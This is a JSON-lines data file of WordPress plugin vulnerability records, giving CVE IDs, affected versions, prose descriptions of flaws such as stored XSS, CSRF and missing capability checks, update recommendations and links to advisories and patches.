{"CVE_ID":"CVE-2024-3819","slug":"jeg-elementor-kit","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Banner widget in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46868a11-0c82-4bd3-82b5-9a19a5a0cef1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46868a11-0c82-4bd3-82b5-9a19a5a0cef1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.4\\\/class\\\/elements\\\/views\\\/class-banner-view.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.4\\\/class\\\/elements\\\/views\\\/class-banner-view.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077328%40jeg-elementor-kit&new=3077328%40jeg-elementor-kit&sfp_email=&sfph_mail=#file565\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077328%40jeg-elementor-kit&new=3077328%40jeg-elementor-kit&sfp_email=&sfph_mail=#file565\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3161","slug":"jeg-elementor-kit","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget's attributes in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48a13fb7-bf1a-4bf2-ac3b-3b5a75fec616?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48a13fb7-bf1a-4bf2-ac3b-3b5a75fec616?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/assets\\\/js\\\/elements\\\/countdown.js#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/assets\\\/js\\\/elements\\\/countdown.js#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077328%40jeg-elementor-kit%2Ftrunk&old=3062484%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077328%40jeg-elementor-kit%2Ftrunk&old=3062484%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10499","slug":"ai-engine","versionImpact":"2.6.3","versionEndExcluding":"2.6.5","description":"The AI Engine WordPress plugin before 2.6.5 does not sanitize and escape a parameter from one of its RESP API endpoint before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8606a93a-f61d-40df-a67e-0ac75eeadee8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8606a93a-f61d-40df-a67e-0ac75eeadee8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5509","slug":"mystickymenu","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The myStickymenu WordPress plugin before 2.6.5 does not adequately authorize some ajax calls, allowing any logged-in user to perform the actions.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b33c262-e7f0-4310-b26d-4727d7c25c9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b33c262-e7f0-4310-b26d-4727d7c25c9d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0334","slug":"jeg-elementor-kit","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attribute of a link in several Elementor widgets in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950e9042-1364-4200-8f57-171346075764?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950e9042-1364-4200-8f57-171346075764?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3077328\\\/jeg-elementor-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3077328\\\/jeg-elementor-kit\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5086","slug":"copy-the-code","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Copy Anything to Clipboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'copy' shortcode in versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969441\\\/copy-the-code#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969441\\\/copy-the-code#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e834a211-ccc8-4a30-a15d-879ba34184e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e834a211-ccc8-4a30-a15d-879ba34184e9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/copy-the-code\\\/tags\\\/2.6.4\\\/classes\\\/class-copy-the-code-shortcode.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/copy-the-code\\\/tags\\\/2.6.4\\\/classes\\\/class-copy-the-code-shortcode.php#L83\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1645","slug":"mollie-forms","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to export payment data collected by this plugin.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php#L904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php#L904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1400","slug":"mollie-forms","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to duplicate arbitrary posts and pages.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1691","slug":"otter-pro","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file upload form, which allows SVG uploads, in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that the patch in 2.6.4 allows SVG uploads but the uploaded SVG files are sanitized.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"name\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1684","slug":"otter-pro","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form file field CSS metabox in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"name\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0428","slug":"mihdan-index-now","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7641d52-e930-4143-9180-2903d018da91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7641d52-e930-4143-9180-2903d018da91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3020958\\\/mihdan-index-now\\\/tags\\\/2.6.4\\\/src\\\/Views\\\/WPOSA.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3020958\\\/mihdan-index-now\\\/tags\\\/2.6.4\\\/src\\\/Views\\\/WPOSA.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4629","slug":"woo-product-slider","versionEndExcluding":"2.6.4","description":"The Product Slider for WooCommerce WordPress plugin before 2.6.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf0a51f9-21d3-4ae8-b7d2-361921038fe8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf0a51f9-21d3-4ae8-b7d2-361921038fe8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13393","slug":"video-share-vod","versionImpact":"2.6.31","versionEndExcluding":"2.6.32","description":"The Video Share VOD \u2013 Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_videos' shortcode in all versions up to, and including, 2.6.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224274%40video-share-vod&new=3224274%40video-share-vod&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224274%40video-share-vod&new=3224274%40video-share-vod&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9e85d85-76cd-4606-918b-87f07098c967?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9e85d85-76cd-4606-918b-87f07098c967?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12449","slug":"video-share-vod","versionImpact":"2.6.30","versionEndExcluding":"2.6.31","description":"The Video Share VOD \u2013 Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_player_html' shortcode in all versions up to, and including, 2.6.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208668\\\/video-share-vod\\\/trunk\\\/video-share-vod.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208668\\\/video-share-vod\\\/trunk\\\/video-share-vod.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10098","slug":"apply-online","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The ApplyOnline  WordPress plugin before 2.6.3 does not protect uploaded files during the application process, allowing unauthenticated users to access them and any private information they contain","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/242dac1f-9a1f-4fde-b8c7-374bd451071d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/242dac1f-9a1f-4fde-b8c7-374bd451071d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11104","slug":"sky-elementor-addons","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blogs) plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the save_options() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. Please note this is limited to option values that can be saved as arrays.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193495%40sky-elementor-addons&new=3193495%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193495%40sky-elementor-addons&new=3193495%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a9810a8-311a-424a-bd64-8d25ee891bb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a9810a8-311a-424a-bd64-8d25ee891bb5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13724","slug":"wallet-system-for-woocommerce","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Wallet System for WooCommerce \u2013 Wallet, Wallet Cashback, Refunds, Partial Payment, Wallet Restriction plugin for WordPress is vulnerable to unauthorized access to functionality in all versions up to, and including, 2.6.2. This makes it possible for unauthenticated attackers to increase their own wallet balance, transfer balances between arbitrary users and initiate transfer requests from other users' wallets.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda326b0-9049-496a-a600-fa65151ce98f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda326b0-9049-496a-a600-fa65151ce98f?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-13682","slug":"wallet-system-for-woocommerce","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Wallet System for WooCommerce \u2013 Wallet, Wallet Cashback, Refunds, Partial Payment, Wallet Restriction plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation in class-wallet-user-table.php. This makes it possible for unauthenticated attackers to modify wallet balances via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/779a9f7a-4582-4d5e-bd9a-9ff7f14b452a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/779a9f7a-4582-4d5e-bd9a-9ff7f14b452a?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-1326","slug":"jeg-elementor-kit","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML Tag attributes in all versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-post-block-view.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-post-block-view.php#L375\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5871","slug":"woo-social-login","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.2 via deserialization of untrusted input from the 'woo_slg_verify' vulnerable parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd592e6-2ac4-4af4-bfc0-d4f834157d71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd592e6-2ac4-4af4-bfc0-d4f834157d71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5868","slug":"woo-social-login","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to Email Verification in all versions up to, and including, 2.6.2 via the use of insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97fbbf5b-d3c7-47ce-b251-ce1fe38af152?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97fbbf5b-d3c7-47ce-b251-ce1fe38af152?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3100","slug":"wedevs-project-manager","versionImpact":"2.6.22","versionEndExcluding":"2.6.23","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping in tasks discussion. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 2.6.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/src\\\/File\\\/Helper\\\/File.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/src\\\/File\\\/Helper\\\/File.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/wedevs-project-manager\\\/trunk\\\/bootstrap\\\/loaders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/wedevs-project-manager\\\/trunk\\\/bootstrap\\\/loaders.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d62b087-b0ca-4fa8-921b-5eeb3fa76596?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d62b087-b0ca-4fa8-921b-5eeb3fa76596?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
